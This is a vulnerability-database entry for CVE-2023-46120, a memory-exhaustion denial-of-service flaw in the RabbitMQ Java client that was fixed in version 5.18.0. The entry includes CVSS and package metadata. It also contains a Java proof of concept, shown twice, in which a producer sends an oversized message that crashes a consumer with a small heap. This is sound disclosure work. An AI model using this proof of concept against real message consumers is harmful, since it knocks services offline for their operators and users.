GHSA-MM8H-8587-P46H

Vulnerability from github – Published: 2023-10-24 01:49 – Updated: 2023-10-27 20:47
VLAI?
Summary
RabbitMQ Java client's Lack of Message Size Limitation leads to Remote DoS Attack
Details

Summary

maxBodyLebgth was not used when receiving Message objects. Attackers could just send a very large Message causing a memory overflow and triggering an OOM Error.

PoC

RbbitMQ

  • Use RabbitMQ 3.11.16 as MQ and specify Message Body size 512M (here it only needs to be larger than the Consumer memory)
  • Start RabbitMQ

Producer

  • Build a String of length 256M and send it to Consumer

package org.springframework.amqp.helloworld; 

import org.springframework.amqp.core.AmqpTemplate; 
import org.springframework.context.ApplicationContext; 
import org.springframework.context.annotation.AnnotationConfigApplicationContext; 

public class Producer {
    public static void main(String[] args) {
        ApplicationContext context = new AnnotationConfigApplicationContext(HelloWorldConfiguration.class);
        AmqpTemplate amqpTemplate = context.getBean(AmqpTemplate.class); 
        String s = "A";
        for(int i=0;i<28;++i){
            s = s + s;
            System.out.println(i);
        }
        amqpTemplate.convertAndSend(s);
        System.out.println("Send Finish");
    }
 }

Consumer

  • First set the heap memory size to 128M
  • Read the message sent by the Producer from the MQ and print the length
package org.springframework.amqp.helloworld;

import org.springframework.amqp.core.AmqpTemplate;
import org.springframework.amqp.core.Message;
import org.springframework.context.ApplicationContext;
import org.springframework.context.annotation.AnnotationConfigApplicationContext;

public class Consumer {

    public static void main(String[] args) {
        ApplicationContext context = new AnnotationConfigApplicationContext(HelloWorldConfiguration.class);
        AmqpTemplate amqpTemplate = context.getBean(AmqpTemplate.class);
        Object o = amqpTemplate.receiveAndConvert();
        if(o != null){
            String s = o.toString();
            System.out.println("Received Length : " + s.length());
        }else{
            System.out.println("null");
        }
    }
}

Results

  • Run the Producer first, then the Consumer
  • Consumer throws OOM Exception

Impact

Users of RabbitMQ may suffer from DoS attacks from RabbitMQ Java client which will ultimately exhaust the memory of the consumer.

Severity ?
4.9 (Medium)
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H
Show details on source website
To clipboard 

{
  "affected": [
    {
      "package": {
        "ecosystem": "Maven",
        "name": "com.rabbitmq:amqp-client"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "5.18.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2023-46120"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-400"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2023-10-24T01:49:09Z",
    "nvd_published_at": "2023-10-25T18:17:36Z",
    "severity": "MODERATE"
  },
  "details": "### Summary\n`maxBodyLebgth` was not used when receiving Message objects.  Attackers could just send a very large Message causing a memory overflow and triggering an OOM Error.\n\n### PoC\n#### RbbitMQ\n* Use RabbitMQ 3.11.16 as MQ and specify Message Body size 512M (here it only needs to be larger than the Consumer memory)\n* Start RabbitMQ\n#### Producer\n* Build a String of length 256M and send it to Consumer\n```\n\npackage org.springframework.amqp.helloworld; \n\nimport org.springframework.amqp.core.AmqpTemplate; \nimport org.springframework.context.ApplicationContext; \nimport org.springframework.context.annotation.AnnotationConfigApplicationContext; \n\npublic class Producer {\n    public static void main(String[] args) {\n        ApplicationContext context = new AnnotationConfigApplicationContext(HelloWorldConfiguration.class);\n        AmqpTemplate amqpTemplate = context.getBean(AmqpTemplate.class); \n        String s = \"A\";\n        for(int i=0;i\u003c28;++i){\n            s = s + s;\n            System.out.println(i);\n        }\n        amqpTemplate.convertAndSend(s);\n        System.out.println(\"Send Finish\");\n    }\n }\n```\n\n#### Consumer\n* First set the heap memory size to 128M\n* Read the message sent by the Producer from the MQ and print the length\n```\npackage org.springframework.amqp.helloworld;\n\nimport org.springframework.amqp.core.AmqpTemplate;\nimport org.springframework.amqp.core.Message;\nimport org.springframework.context.ApplicationContext;\nimport org.springframework.context.annotation.AnnotationConfigApplicationContext;\n\npublic class Consumer {\n    \n    public static void main(String[] args) {\n        ApplicationContext context = new AnnotationConfigApplicationContext(HelloWorldConfiguration.class);\n        AmqpTemplate amqpTemplate = context.getBean(AmqpTemplate.class);\n        Object o = amqpTemplate.receiveAndConvert();\n        if(o != null){\n            String s = o.toString();\n            System.out.println(\"Received Length : \" + s.length());\n        }else{\n            System.out.println(\"null\");\n        }\n    }\n}\n```\n#### Results\n* Run the Producer first, then the Consumer\n* Consumer throws OOM Exception\n\n\n### Impact\nUsers of RabbitMQ may suffer from  DoS attacks from RabbitMQ Java client which will ultimately exhaust the memory of the consumer.\n",
  "id": "GHSA-mm8h-8587-p46h",
  "modified": "2023-10-27T20:47:02Z",
  "published": "2023-10-24T01:49:09Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/rabbitmq/rabbitmq-java-client/security/advisories/GHSA-mm8h-8587-p46h"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-46120"
    },
    {
      "type": "WEB",
      "url": "https://github.com/rabbitmq/rabbitmq-java-client/issues/1062"
    },
    {
      "type": "WEB",
      "url": "https://github.com/rabbitmq/rabbitmq-java-client/commit/714aae602dcae6cb4b53cadf009323ebac313cc8"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/rabbitmq/rabbitmq-java-client"
    },
    {
      "type": "WEB",
      "url": "https://github.com/rabbitmq/rabbitmq-java-client/releases/tag/v5.18.0"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "RabbitMQ Java client\u0027s Lack of Message Size Limitation leads to Remote DoS Attack"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.



Detection rules are retrieved from Rulezet.